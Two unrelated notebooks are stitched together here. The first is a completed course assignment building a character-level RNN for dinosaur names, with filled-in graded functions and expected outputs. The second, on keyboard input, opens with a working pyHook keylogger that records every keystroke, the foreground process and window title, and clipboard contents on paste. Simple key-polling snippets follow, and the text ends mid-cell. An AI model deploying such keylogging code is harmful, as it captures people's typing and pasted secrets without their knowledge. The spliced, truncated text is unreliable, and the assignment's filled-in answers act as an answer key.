* At every time-step $t$, $y^{\langle t \rangle} = x^{\langle t+1 \rangle}$. The prediction at time $t$ is the same as the input at time $t + 1$.
## 2 - Building blocks of the model
In this part, you will build two important blocks of the overall model:
- Gradient clipping: to avoid exploding gradients
- Sampling: a technique used to generate characters
You will then apply these two functions to build the model.
### 2.1 - Clipping the gradients in the optimization loop
In this section you will implement the `clip` function that you will call inside of your optimization loop.
#### Exploding gradients
* When gradients are very large, they're called "exploding gradients."
* Exploding gradients make the training process more difficult, because the updates may be so large that they "overshoot" the optimal values during back propagation.
Recall that your overall loop structure usually consists of:
* forward pass,
* cost computation,
* backward pass,
* parameter update.
Before updating the parameters, you will perform gradient clipping to make sure that your gradients are not "exploding."
#### gradient clipping
In the exercise below, you will implement a function `clip` that takes in a dictionary of gradients and returns a clipped version of gradients if needed.
* There are different ways to clip gradients.
* We will use a simple element-wise clipping procedure, in which every element of the gradient vector is clipped to lie between some range [-N, N].
* For example, if the N=10
- The range is [-10, 10]
- If any component of the gradient vector is greater than 10, it is set to 10.
- If any component of the gradient vector is less than -10, it is set to -10.
- If any components are between -10 and 10, they keep their original values.
<img src="images/clip.png" style="width:400;height:150px;">
<caption><center> **Figure 2**: Visualization of gradient descent with and without gradient clipping, in a case where the network is running into "exploding gradient" problems. </center></caption>
**Exercise**:
Implement the function below to return the clipped gradients of your dictionary `gradients`.
* Your function takes in a maximum threshold and returns the clipped versions of the gradients.
* You can check out [numpy.clip](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.clip.html).
- You will need to use the argument "`out = ...`".
- Using the "`out`" parameter allows you to update a variable "in-place".
- If you don't use "`out`" argument, the clipped variable is stored in the variable "gradient" but does not update the gradient variables `dWax`, `dWaa`, `dWya`, `db`, `dby`.
```
### GRADED FUNCTION: clip
def clip(gradients, maxValue):
    """
    Clip every gradient in `gradients` element-wise to the range [-maxValue, maxValue].

    Arguments:
    gradients -- dictionary with entries "dWaa", "dWax", "dWya", "db", "dby"
    maxValue -- positive threshold; any entry above it is set to maxValue, and
                any entry below -maxValue is set to -maxValue

    Returns:
    gradients -- the same dictionary, with each gradient array clipped in place.
    """
    # `out=` makes np.clip write back into the same array, so the entries of
    # the dictionary are updated directly (no copies are made).
    for key in ("dWaa", "dWax", "dWya", "db", "dby"):
        np.clip(gradients[key], -maxValue, maxValue, out=gradients[key])
    return gradients
# Test with a maxvalue of 10
mValue = 10
np.random.seed(3)
# Random gradients scaled by 10 so several entries fall outside [-10, 10].
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, mValue)
# Spot-check a few entries; saturated values should print as +/-10.0.
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
```
** Expected output:**
```Python
gradients["dWaa"][1][2] = 10.0
gradients["dWax"][3][1] = -10.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 10.]
gradients["dby"][1] = [ 8.45833407]
```
```
# Test with a maxValue of 5
mValue = 5
np.random.seed(3)
# Same random gradients as the previous test; now clipped into [-5, 5].
dWax = np.random.randn(5,3)*10
dWaa = np.random.randn(5,5)*10
dWya = np.random.randn(2,5)*10
db = np.random.randn(5,1)*10
dby = np.random.randn(2,1)*10
gradients = {"dWax": dWax, "dWaa": dWaa, "dWya": dWya, "db": db, "dby": dby}
gradients = clip(gradients, mValue)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("gradients[\"dWax\"][3][1] =", gradients["dWax"][3][1])
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
del mValue  # avoid accidentally reusing this test value in later cells
```
** Expected Output: **
```Python
gradients["dWaa"][1][2] = 5.0
gradients["dWax"][3][1] = -5.0
gradients["dWya"][1][2] = 0.29713815361
gradients["db"][4] = [ 5.]
gradients["dby"][1] = [ 5.]
```
### 2.2 - Sampling
Now assume that your model is trained. You would like to generate new text (characters). The process of generation is explained in the picture below:
<img src="images/dinos3.png" style="width:500;height:300px;">
<caption><center> **Figure 3**: In this picture, we assume the model is already trained. We pass in $x^{\langle 1\rangle} = \vec{0}$ at the first time step, and have the network sample one character at a time. </center></caption>
**Exercise**: Implement the `sample` function below to sample characters. You need to carry out 4 steps:
- **Step 1**: Input the "dummy" vector of zeros $x^{\langle 1 \rangle} = \vec{0}$.
- This is the default input before we've generated any characters.
We also set $a^{\langle 0 \rangle} = \vec{0}$
- **Step 2**: Run one step of forward propagation to get $a^{\langle 1 \rangle}$ and $\hat{y}^{\langle 1 \rangle}$. Here are the equations:
hidden state:
$$ a^{\langle t+1 \rangle} = \tanh(W_{ax} x^{\langle t+1 \rangle } + W_{aa} a^{\langle t \rangle } + b)\tag{1}$$
activation:
$$ z^{\langle t + 1 \rangle } = W_{ya} a^{\langle t + 1 \rangle } + b_y \tag{2}$$
prediction:
$$ \hat{y}^{\langle t+1 \rangle } = softmax(z^{\langle t + 1 \rangle })\tag{3}$$
- Details about $\hat{y}^{\langle t+1 \rangle }$:
- Note that $\hat{y}^{\langle t+1 \rangle }$ is a (softmax) probability vector (its entries are between 0 and 1 and sum to 1).
- $\hat{y}^{\langle t+1 \rangle}_i$ represents the probability that the character indexed by "i" is the next character.
- We have provided a `softmax()` function that you can use.
#### Additional Hints
- $x^{\langle 1 \rangle}$ is `x` in the code. When creating the one-hot vector, make a numpy array of zeros, with the number of rows equal to the number of unique characters, and the number of columns equal to one. It's a 2D and not a 1D array.
- $a^{\langle 0 \rangle}$ is `a_prev` in the code. It is a numpy array of zeros, where the number of rows is $n_{a}$, and number of columns is 1. It is a 2D array as well. $n_{a}$ is retrieved by getting the number of columns in $W_{aa}$ (the numbers need to match in order for the matrix multiplication $W_{aa}a^{\langle t \rangle}$ to work).
- [numpy.dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html)
- [numpy.tanh](https://docs.scipy.org/doc/numpy/reference/generated/numpy.tanh.html)
#### Using 2D arrays instead of 1D arrays
* You may be wondering why we emphasize that $x^{\langle 1 \rangle}$ and $a^{\langle 0 \rangle}$ are 2D arrays and not 1D vectors.
* For matrix multiplication in numpy, if we multiply a 2D matrix with a 1D vector, we end up with a 1D array.
* This becomes a problem when we add two arrays where we expected them to have the same shape.
* When two arrays with a different number of dimensions are added together, Python "broadcasts" one across the other.
* Here is some sample code that shows the difference between using a 1D and 2D array.
```
matrix1 = np.array([[1,1],[2,2],[3,3]]) # (3,2)
matrix2 = np.array([[0],[0],[0]]) # (3,1)
vector1D = np.array([1,1]) # (2,)
vector2D = np.array([[1],[1]]) # (2,1)
print("matrix1 \n", matrix1,"\n")
print("matrix2 \n", matrix2,"\n")
print("vector1D \n", vector1D,"\n")
print("vector2D \n", vector2D)
print("Multiply 2D and 1D arrays: result is a 1D array\n",
np.dot(matrix1,vector1D))
print("Multiply 2D and 2D arrays: result is a 2D array\n",
np.dot(matrix1,vector2D))
print("Adding (3 x 1) vector to a (3 x 1) vector is a (3 x 1) vector\n",
"This is what we want here!\n",
np.dot(matrix1,vector2D) + matrix2)
print("Adding a (3,) vector to a (3 x 1) vector\n",
"broadcasts the 1D array across the second dimension\n",
"Not what we want here!\n",
np.dot(matrix1,vector1D) + matrix2
)
```
- **Step 3**: Sampling:
- Now that we have $y^{\langle t+1 \rangle}$, we want to select the next letter in the dinosaur name. If we select the most probable, the model will always generate the same result given a starting letter. To make the results more interesting, we will use np.random.choice to select a next letter that is *likely*, but not always the same.
- Pick the next character's **index** according to the probability distribution specified by $\hat{y}^{\langle t+1 \rangle }$.
- This means that if $\hat{y}^{\langle t+1 \rangle }_i = 0.16$, you will pick the index "i" with 16% probability.
- Use [np.random.choice](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.choice.html).
Example of how to use `np.random.choice()`:
```python
np.random.seed(0)
probs = np.array([0.1, 0.0, 0.7, 0.2])
idx = np.random.choice(range(len(probs)), p = probs)
```
- This means that you will pick the index (`idx`) according to the distribution:
$P(index = 0) = 0.1, P(index = 1) = 0.0, P(index = 2) = 0.7, P(index = 3) = 0.2$.
- Note that the value that's set to `p` should be set to a 1D vector.
- Also notice that $\hat{y}^{\langle t+1 \rangle}$, which is `y` in the code, is a 2D array.
- Also notice, while in your implementation, the first argument to np.random.choice is just an ordered list [0,1,.., vocab_len-1], it is *Not* appropriate to use char_to_ix.values(). The *order* of values returned by a python dictionary .values() call will be the same order as they are added to the dictionary. The grader may have a different order when it runs your routine than when you run it in your notebook.
##### Additional Hints
- [range](https://docs.python.org/3/library/functions.html#func-range)
- [numpy.ravel](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ravel.html) takes a multi-dimensional array and returns its contents inside of a 1D vector.
```Python
arr = np.array([[1,2],[3,4]])
print("arr")
print(arr)
print("arr.ravel()")
print(arr.ravel())
```
Output:
```Python
arr
[[1 2]
[3 4]]
arr.ravel()
[1 2 3 4]
```
- Note that `append` is an "in-place" operation. In other words, don't do this:
```Python
fun_hobbies = fun_hobbies.append('learning') ## Doesn't give you what you want
```
- **Step 4**: Update to $x^{\langle t \rangle }$
- The last step to implement in `sample()` is to update the variable `x`, which currently stores $x^{\langle t \rangle }$, with the value of $x^{\langle t + 1 \rangle }$.
- You will represent $x^{\langle t + 1 \rangle }$ by creating a one-hot vector corresponding to the character that you have chosen as your prediction.
- You will then forward propagate $x^{\langle t + 1 \rangle }$ in Step 1 and keep repeating the process until you get a "\n" character, indicating that you have reached the end of the dinosaur name.
##### Additional Hints
- In order to reset `x` before setting it to the new one-hot vector, you'll want to set all the values to zero.
- You can either create a new numpy array: [numpy.zeros](https://docs.scipy.org/doc/numpy/reference/generated/numpy.zeros.html)
- Or fill all values with a single number: [numpy.ndarray.fill](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.fill.html)
```
# GRADED FUNCTION: sample
def sample(parameters, char_to_ix, seed):
    """
    Sample a sequence of character indices from the RNN's output distributions.

    Arguments:
    parameters -- python dictionary containing the trained weights Waa, Wax, Wya, by, and b.
    char_to_ix -- python dictionary mapping each character to an index.
    seed -- used for grading purposes. Do not worry about it.

    Returns:
    indices -- a list of the sampled character indices, ending with the newline index.
    """
    # Pull out the weights and derive the vocabulary size / hidden-state size.
    Waa, Wax, Wya, by, b = (parameters[k] for k in ("Waa", "Wax", "Wya", "by", "b"))
    vocab_size = by.shape[0]
    n_a = Waa.shape[1]

    # Step 1: start from an all-zero one-hot input and an all-zero hidden state.
    x = np.zeros((vocab_size, 1))
    a_prev = np.zeros((n_a, 1))

    indices = []  # sampled character indices, in order
    idx = -1      # sentinel: no character has been sampled yet

    # Sample one character per iteration; stop on newline or after 50 characters.
    # The hard cap prevents an infinite loop with a poorly trained model.
    counter = 0
    newline_character = char_to_ix['\n']
    while idx != newline_character and counter != 50:
        # Step 2: one forward step -> hidden state, logits, softmax probabilities.
        a = np.tanh(np.dot(Wax, x) + np.dot(Waa, a_prev) + b)
        z = np.dot(Wya, a) + by
        y = softmax(z)

        # for grading purposes
        np.random.seed(counter + seed)

        # Step 3: draw the next character's index from the distribution y.
        # y is 2D, so ravel() flattens it into the 1D vector np.random.choice expects.
        idx = np.random.choice(range(len(y)), p=y.ravel())
        indices.append(idx)

        # Step 4: feed the sampled character back in as a fresh one-hot vector.
        x = np.zeros((vocab_size, 1))
        x[idx] = 1
        a_prev = a

        # for grading purposes
        seed += 1
        counter += 1

    # If we hit the 50-character cap without sampling '\n', terminate explicitly.
    if counter == 50:
        indices.append(char_to_ix['\n'])
    return indices
np.random.seed(2)
# n_a = 100 hidden units (the first value is unused here).
_, n_a = 20, 100
# Random, untrained parameters; vocab_size comes from the earlier data-loading cell.
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
indices = sample(parameters, char_to_ix, 0)
print("Sampling:")
print("list of sampled indices:\n", indices)
print("list of sampled characters:\n", [ix_to_char[i] for i in indices])
```
** Expected output:**
```Python
Sampling:
list of sampled indices:
[12, 17, 24, 14, 13, 9, 10, 22, 24, 6, 13, 11, 12, 6, 21, 15, 21, 14, 3, 2, 1, 21, 18, 24, 7, 25, 6, 25, 18, 10, 16, 2, 3, 8, 15, 12, 11, 7, 1, 12, 10, 2, 7, 7, 11, 17, 24, 12, 13, 24, 0]
list of sampled characters:
['l', 'q', 'x', 'n', 'm', 'i', 'j', 'v', 'x', 'f', 'm', 'k', 'l', 'f', 'u', 'o', 'u', 'n', 'c', 'b', 'a', 'u', 'r', 'x', 'g', 'y', 'f', 'y', 'r', 'j', 'p', 'b', 'c', 'h', 'o', 'l', 'k', 'g', 'a', 'l', 'j', 'b', 'g', 'g', 'k', 'q', 'x', 'l', 'm', 'x', '\n']
```
## 3 - Building the language model
It is time to build the character-level language model for text generation.
### 3.1 - Gradient descent
* In this section you will implement a function performing one step of stochastic gradient descent (with clipped gradients).
* You will go through the training examples one at a time, so the optimization algorithm will be stochastic gradient descent.
As a reminder, here are the steps of a common optimization loop for an RNN:
- Forward propagate through the RNN to compute the loss
- Backward propagate through time to compute the gradients of the loss with respect to the parameters
- Clip the gradients
- Update the parameters using gradient descent
**Exercise**: Implement the optimization process (one step of stochastic gradient descent).
The following functions are provided:
```python
def rnn_forward(X, Y, a_prev, parameters):
""" Performs the forward propagation through the RNN and computes the cross-entropy loss.
It returns the loss' value as well as a "cache" storing values to be used in backpropagation."""
....
return loss, cache
def rnn_backward(X, Y, parameters, cache):
""" Performs the backward propagation through time to compute the gradients of the loss with respect
to the parameters. It returns also all the hidden states."""
...
return gradients, a
def update_parameters(parameters, gradients, learning_rate):
""" Updates parameters using the Gradient Descent Update Rule."""
...
return parameters
```
Recall that you previously implemented the `clip` function:
#### parameters
* Note that the weights and biases inside the `parameters` dictionary are being updated by the optimization, even though `parameters` is not one of the returned values of the `optimize` function. The `parameters` dictionary is passed by reference into the function, so changes to this dictionary are making changes to the `parameters` dictionary even when accessed outside of the function.
* Python dictionaries and lists are "pass by reference", which means that if you pass a dictionary into a function and modify the dictionary within the function, this changes that same dictionary (it's not a copy of the dictionary).
```
# GRADED FUNCTION: optimize
def optimize(X, Y, a_prev, parameters, learning_rate = 0.01):
    """
    Run a single step of stochastic gradient descent on one training example.

    Arguments:
    X -- list of integers, each mapping to a character in the vocabulary.
    Y -- list of integers, identical to X but shifted one index to the left.
    a_prev -- previous hidden state.
    parameters -- python dictionary containing:
                        Wax -- input weights, shape (n_a, n_x)
                        Waa -- hidden-state weights, shape (n_a, n_a)
                        Wya -- hidden-to-output weights, shape (n_y, n_a)
                        b -- hidden bias, shape (n_a, 1)
                        by -- output bias, shape (n_y, 1)
                  NOTE: updated in place, since dictionaries are passed by reference.
    learning_rate -- step size for the gradient-descent update.

    Returns:
    loss -- value of the cross-entropy loss for this example.
    gradients -- python dictionary of clipped gradients (dWax, dWaa, dWya, db, dby).
    a[len(X)-1] -- the last hidden state, of shape (n_a, 1).
    """
    # Forward pass: loss plus a cache of activations needed for backprop.
    loss, cache = rnn_forward(X, Y, a_prev, parameters)
    # Backward pass through time: gradients of the loss w.r.t. every parameter.
    gradients, a = rnn_backward(X, Y, parameters, cache)
    # Clip each gradient element-wise into [-5, 5] to keep the update bounded.
    gradients = clip(gradients, 5)
    # Gradient-descent update rule (mutates `parameters` in place).
    parameters = update_parameters(parameters, gradients, learning_rate)
    return loss, gradients, a[len(X) - 1]
np.random.seed(1)
vocab_size, n_a = 27, 100
# Random initial hidden state and untrained parameters.
a_prev = np.random.randn(n_a, 1)
Wax, Waa, Wya = np.random.randn(n_a, vocab_size), np.random.randn(n_a, n_a), np.random.randn(vocab_size, n_a)
b, by = np.random.randn(n_a, 1), np.random.randn(vocab_size, 1)
parameters = {"Wax": Wax, "Waa": Waa, "Wya": Wya, "b": b, "by": by}
# A short input sequence and its labels (X shifted one position left).
X = [12,3,5,11,22,3]
Y = [4,14,11,22,25, 26]
loss, gradients, a_last = optimize(X, Y, a_prev, parameters, learning_rate = 0.01)
print("Loss =", loss)
print("gradients[\"dWaa\"][1][2] =", gradients["dWaa"][1][2])
print("np.argmax(gradients[\"dWax\"]) =", np.argmax(gradients["dWax"]))
print("gradients[\"dWya\"][1][2] =", gradients["dWya"][1][2])
print("gradients[\"db\"][4] =", gradients["db"][4])
print("gradients[\"dby\"][1] =", gradients["dby"][1])
print("a_last[4] =", a_last[4])
```
** Expected output:**
```Python
Loss = 126.503975722
gradients["dWaa"][1][2] = 0.194709315347
np.argmax(gradients["dWax"]) = 93
gradients["dWya"][1][2] = -0.007773876032
gradients["db"][4] = [-0.06809825]
gradients["dby"][1] = [ 0.01538192]
a_last[4] = [-1.]
```
### 3.2 - Training the model
* Given the dataset of dinosaur names, we use each line of the dataset (one name) as one training example.
* Every 2000 steps of stochastic gradient descent, you will sample several randomly chosen names to see how the algorithm is doing.
**Exercise**: Follow the instructions and implement `model()`. When `examples[index]` contains one dinosaur name (string), to create an example (X, Y), you can use this:
##### Set the index `idx` into the list of examples
* Using the for-loop, walk through the shuffled list of dinosaur names in the list "examples".
* For example, if there are n_e examples, and the for-loop increments the index to n_e onwards, think of how you would make the index cycle back to 0, so that we can continue feeding the examples into the model when j is n_e, n_e + 1, etc.
* Hint: n_e + 1 divided by n_e is one with a remainder of 1, so `(n_e + 1) % n_e` is 1.
* `%` is the modulus operator in python.
##### Extract a single example from the list of examples
* `single_example`: use the `idx` index that you set previously to get one word from the list of examples.
##### Convert a string into a list of characters: `single_example_chars`
* `single_example_chars`: A string is a list of characters.
* You can use a list comprehension (recommended over for-loops) to generate a list of characters.
```Python
str = 'I love learning'
list_of_chars = [c for c in str]
print(list_of_chars)
```
```
['I', ' ', 'l', 'o', 'v', 'e', ' ', 'l', 'e', 'a', 'r', 'n', 'i', 'n', 'g']
```
##### Convert list of characters to a list of integers: `single_example_ix`
* Create a list that contains the index numbers associated with each character.
* Use the dictionary `char_to_ix`
* You can combine this with the list comprehension that is used to get a list of characters from a string.
##### Create the list of input characters: `X`
* `rnn_forward` uses the **`None`** value as a flag to set the input vector as a zero-vector.
* Prepend the list [**`None`**] in front of the list of input characters.
* There is more than one way to prepend a value to a list. One way is to add two lists together: `['a'] + ['b']`
##### Get the integer representation of the newline character `ix_newline`
* `ix_newline`: The newline character signals the end of the dinosaur name.
- get the integer representation of the newline character `'\n'`.
- Use `char_to_ix`
##### Set the list of labels (integer representation of the characters): `Y`
* The goal is to train the RNN to predict the next letter in the name, so the labels are the list of characters that are one time step ahead of the characters in the input `X`.
- For example, `Y[0]` contains the same value as `X[1]`
* The RNN should predict a newline at the last letter so add ix_newline to the end of the labels.
- Append the integer representation of the newline character to the end of `Y`.
- Note that `append` is an in-place operation.
- It might be easier for you to add two lists together.
```
# GRADED FUNCTION: model
def model(data, ix_to_char, char_to_ix, num_iterations = 35000, n_a = 50, dino_names = 7, vocab_size = 27, verbose = False):
    """
    Trains the model and generates dinosaur names.

    Arguments:
    data -- text corpus
    ix_to_char -- dictionary that maps the index to a character
    char_to_ix -- dictionary that maps a character to an index
    num_iterations -- number of iterations to train the model for
    n_a -- number of units of the RNN cell
    dino_names -- number of dinosaur names you want to sample at each iteration.
    vocab_size -- number of unique characters found in the text (size of the vocabulary)
    verbose -- if True, print debug information about how X and Y are formed

    Returns:
    parameters -- learned parameters
    """
    # One-hot input and output vectors both have vocab_size rows.
    n_x, n_y = vocab_size, vocab_size
    # Initialize parameters
    parameters = initialize_parameters(n_a, n_x, n_y)
    # Initialize loss (required because we smooth the loss as a moving average)
    loss = get_initial_loss(vocab_size, dino_names)
    # Build the list of all dinosaur names (one training example per line).
    with open("dinos.txt") as f:
        examples = f.readlines()
    examples = [x.lower().strip() for x in examples]
    # Shuffle the list of names (seeded so grading is reproducible).
    np.random.seed(0)
    np.random.shuffle(examples)
    # Initialize the hidden state of the RNN.
    a_prev = np.zeros((n_a, 1))
    # Optimization loop
    for j in range(num_iterations):
        ### START CODE HERE ###
        # Cycle through the examples with the modulus operator so the index
        # wraps back to 0 once j reaches len(examples).
        idx = j%len(examples)
        # Build the input X: the example as character indices, with None
        # prepended so rnn_forward uses a zero vector for the first time step.
        single_example = examples[idx]
        single_example_chars = [c for c in single_example]
        single_example_ix = [char_to_ix[c] for c in single_example]
        X = [None]+single_example_ix
        # Build the labels Y: X shifted one step left, with the newline index
        # appended so the RNN learns to end each name.
        ix_newline = [char_to_ix["\n"]]
        Y = X[1:]+ix_newline
        # One optimization step: Forward-prop -> Backward-prop -> Clip -> Update
        # with a learning rate of 0.01.
        curr_loss, gradients, a_prev = optimize(X,Y,a_prev,parameters,learning_rate=0.01)
        ### END CODE HERE ###
        # Debug statements to aid in correctly forming X, Y.
        if verbose and j in [0, len(examples) -1, len(examples)]:
            print("j = " , j, "idx = ", idx,)
        if verbose and j in [0]:
            print("single_example =", single_example)
            print("single_example_chars", single_example_chars)
            print("single_example_ix", single_example_ix)
            print(" X = ", X, "\n", "Y = ", Y, "\n")
        # Exponential moving average keeps the reported loss curve smooth.
        loss = smooth(loss, curr_loss)
        # Every 2000 iterations, sample names to check whether the model is learning.
        if j % 2000 == 0:
            print('Iteration: %d, Loss: %f' % (j, loss) + '\n')
            # Sample `dino_names` names, incrementing the seed each time so the
            # output is reproducible for grading.
            seed = 0
            for name in range(dino_names):
                sampled_indices = sample(parameters, char_to_ix, seed)
                print_sample(sampled_indices, ix_to_char)
                seed += 1
            print('\n')
    return parameters
```
Run the following cell, you should observe your model outputting random-looking characters at the first iteration. After a few thousand iterations, your model should learn to generate reasonable-looking names.
```
# Train on the dinosaur corpus; verbose=True prints the first X/Y pair for debugging.
parameters = model(data, ix_to_char, char_to_ix, verbose = True)
```
** Expected Output**
```Python
j = 0 idx = 0
single_example = turiasaurus
single_example_chars ['t', 'u', 'r', 'i', 'a', 's', 'a', 'u', 'r', 'u', 's']
single_example_ix [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]
X = [None, 20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19]
Y = [20, 21, 18, 9, 1, 19, 1, 21, 18, 21, 19, 0]
Iteration: 0, Loss: 23.087336
Nkzxwtdmfqoeyhsqwasjkjvu
Kneb
Kzxwtdmfqoeyhsqwasjkjvu
Neb
Zxwtdmfqoeyhsqwasjkjvu
Eb
Xwtdmfqoeyhsqwasjkjvu
j = 1535 idx = 1535
j = 1536 idx = 0
Iteration: 2000, Loss: 27.884160
...
Iteration: 34000, Loss: 22.447230
Onyxipaledisons
Kiabaeropa
Lussiamang
Pacaeptabalsaurus
Xosalong
Eiacoteg
Troia
```
## Conclusion
You can see that your algorithm has started to generate plausible dinosaur names towards the end of the training. At first, it was generating random characters, but towards the end you could see dinosaur names with cool endings. Feel free to run the algorithm even longer and play with hyperparameters to see if you can get even better results. Our implementation generated some really cool names like `maconucon`, `marloralus` and `macingsersaurus`. Your model hopefully also learned that dinosaur names tend to end in `saurus`, `don`, `aura`, `tor`, etc.
If your model generates some non-cool names, don't blame the model entirely--not all actual dinosaur names sound cool. (For example, `dromaeosauroides` is an actual dinosaur name and is in the training set.) But this model should give you a set of candidates from which you can pick the coolest!
This assignment had used a relatively small dataset, so that you could train an RNN quickly on a CPU. Training a model of the english language requires a much bigger dataset, and usually needs much more computation, and could run for many hours on GPUs. We ran our dinosaur name for quite some time, and so far our favorite name is the great, undefeatable, and fierce: Mangosaurus!
<img src="images/mangosaurus.jpeg" style="width:250;height:300px;">
## 4 - Writing like Shakespeare
The rest of this notebook is optional and is not graded, but we hope you'll do it anyway since it's quite fun and informative.
A similar (but more complicated) task is to generate Shakespeare poems. Instead of learning from a dataset of Dinosaur names you can use a collection of Shakespearian poems. Using LSTM cells, you can learn longer term dependencies that span many characters in the text--e.g., where a character appearing somewhere a sequence can influence what should be a different character much much later in the sequence. These long term dependencies were less important with dinosaur names, since the names were quite short.
<img src="images/shakespeare.jpg" style="width:500;height:400px;">
<caption><center> Let's become poets! </center></caption>
We have implemented a Shakespeare poem generator with Keras. Run the following cell to load the required packages and models. This may take a few minutes.
```
from __future__ import print_function
from keras.callbacks import LambdaCallback
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking
from keras.layers import LSTM
from keras.utils.data_utils import get_file
from keras.preprocessing.sequence import pad_sequences
from shakespeare_utils import *
import sys
import io
```
To save you some time, we have already trained a model for ~1000 epochs on a collection of Shakespearian poems called [*"The Sonnets"*](shakespeare.txt).
Let's train the model for one more epoch. When it finishes training for an epoch---this will also take a few minutes---you can run `generate_output`, which will prompt asking you for an input (`<`40 characters). The poem will start with your sentence, and our RNN-Shakespeare will complete the rest of the poem for you! For example, try "Forsooth this maketh no sense " (don't enter the quotation marks). Depending on whether you include the space at the end, your results might also differ--try it both ways, and try other inputs as well.
```
# Generate sample text at the end of each epoch via the Keras callback hook.
print_callback = LambdaCallback(on_epoch_end=on_epoch_end)
model.fit(x, y, batch_size=128, epochs=1, callbacks=[print_callback])
# Run this cell to try different inputs without having to re-train the model.
generate_output()
```
The RNN-Shakespeare model is very similar to the one you have built for dinosaur names. The only major differences are:
- LSTMs instead of the basic RNN to capture longer-range dependencies
- The model is a deeper, stacked LSTM model (2 layer)
- Using Keras instead of python to simplify the code
If you want to learn more, you can also check out the Keras Team's text generation implementation on GitHub: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py.
Congratulations on finishing this notebook!
**References**:
- This exercise took inspiration from Andrej Karpathy's implementation: https://gist.github.com/karpathy/d4dee566867f8291f086. To learn more about text generation, also check out Karpathy's [blog post](http://karpathy.github.io/2015/05/21/rnn-effectiveness/).
- For the Shakespearian poem generator, our implementation was based on the implementation of an LSTM text generator by the Keras team: https://github.com/keras-team/keras/blob/master/examples/lstm_text_generation.py
| github_jupyter |
# pyHook
```
#-*- coding:utf8 -*-
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
# Shortcuts to the Win32 DLLs used below.
user32 = windll.user32      # window / foreground-window APIs
kernel32 = windll.kernel32  # process handle management
psapi = windll.psapi        # module (executable) name lookup
# Title of the window that most recently produced a keystroke.
current_window = None
def get_current_process():
    """Print the PID, executable name and window title of the foreground window."""
    # Handle of the window currently in the foreground.
    # (Bug fix: the call was split across two lines as `user32.GetForeground` /
    # `Window()`, which is a NameError at runtime.)
    hwnd = user32.GetForegroundWindow()

    # Resolve the process ID that owns the window.
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    process_id = "%d" % pid.value

    # Zero-initialized 512-byte buffer for the executable name.
    # (create_string_buffer(512) works on both Python 2 and 3; passing a
    # str of NUL characters raises TypeError on Python 3.)
    executable = create_string_buffer(512)

    # Open the process with PROCESS_QUERY_INFORMATION (0x400) | PROCESS_VM_READ (0x10).
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    # Name of the executable module backing the process.
    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)

    # Read the window title.
    window_title = create_string_buffer(512)
    user32.GetWindowTextA(hwnd, byref(window_title), 512)

    # Print the process information.
    print()
    print("[ PID: %s - %s - %s]" % (process_id, executable.value,
                                    window_title.value))
    print()

    # Only the process handle is a kernel handle; window handles must NOT be
    # passed to CloseHandle (the original `CloseHandle(hwnd)` was invalid).
    kernel32.CloseHandle(h_process)
def keyStore(event):
    """Keyboard-hook callback: log printable keys, clipboard pastes and window switches."""
    global current_window

    # Report process info whenever the target switches to a different window.
    if current_window != event.WindowName:
        current_window = event.WindowName
        get_current_process()

    code = event.Ascii
    if 32 < code < 127:
        # Regular printable character (non-modifier, non-control key).
        print(chr(code), end=' ')
    elif event.Key == "V":
        # CTRL-V: grab whatever is currently on the clipboard.
        win32clipboard.OpenClipboard()
        pasted_value = win32clipboard.GetClipboardData()
        win32clipboard.CloseClipboard()
        print("[PASTE] - %s" % (pasted_value), end=' ')
    else:
        # Any other non-printable / special key.
        print("[%s]" % event.Key, end=' ')

    # Return True so the event is passed on to the next hook.
    return True
# Create and register the hook manager.
k1 = pyHook.HookManager()
# Route every key-down event to keyStore.
k1.KeyDown = keyStore
# Install the keyboard hook, then pump Windows messages forever.
k1.HookKeyboard()
pythoncom.PumpMessages()
```
# keyboard
```
import keyboard  # Using module keyboard
# Busy-poll the keyboard until 'q' is pressed.
while True:  # making a loop
    try:  # used try so that if user pressed other than the given key error will not be shown
        if keyboard.is_pressed('q'):  # if key 'q' is pressed
            print('You Pressed A Key!')
            break  # finishing the loop
        else:
            pass
    # NOTE(review): deliberately broad best-effort handler — any error (e.g. a
    # key keyboard cannot translate) just ends the loop instead of crashing.
    except:
        break  # if user pressed other than the given key the loop will break
```
# msvcrt
```
import msvcrt
# Busy-poll the Windows console for keystrokes (msvcrt is Windows-only).
while True:
    if msvcrt.kbhit():           # a keypress is waiting in the console buffer
        key = msvcrt.getch()     # read one keystroke (as bytes) without echoing it
        print(key)  # just to show the result
# pygame
```
import pygame, sys
import pygame.locals

pygame.init()

# Black 1280x1024 window used only to capture keyboard focus.
BLACK = (0,0,0)
WIDTH = 1280
HEIGHT = 1024
windowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)
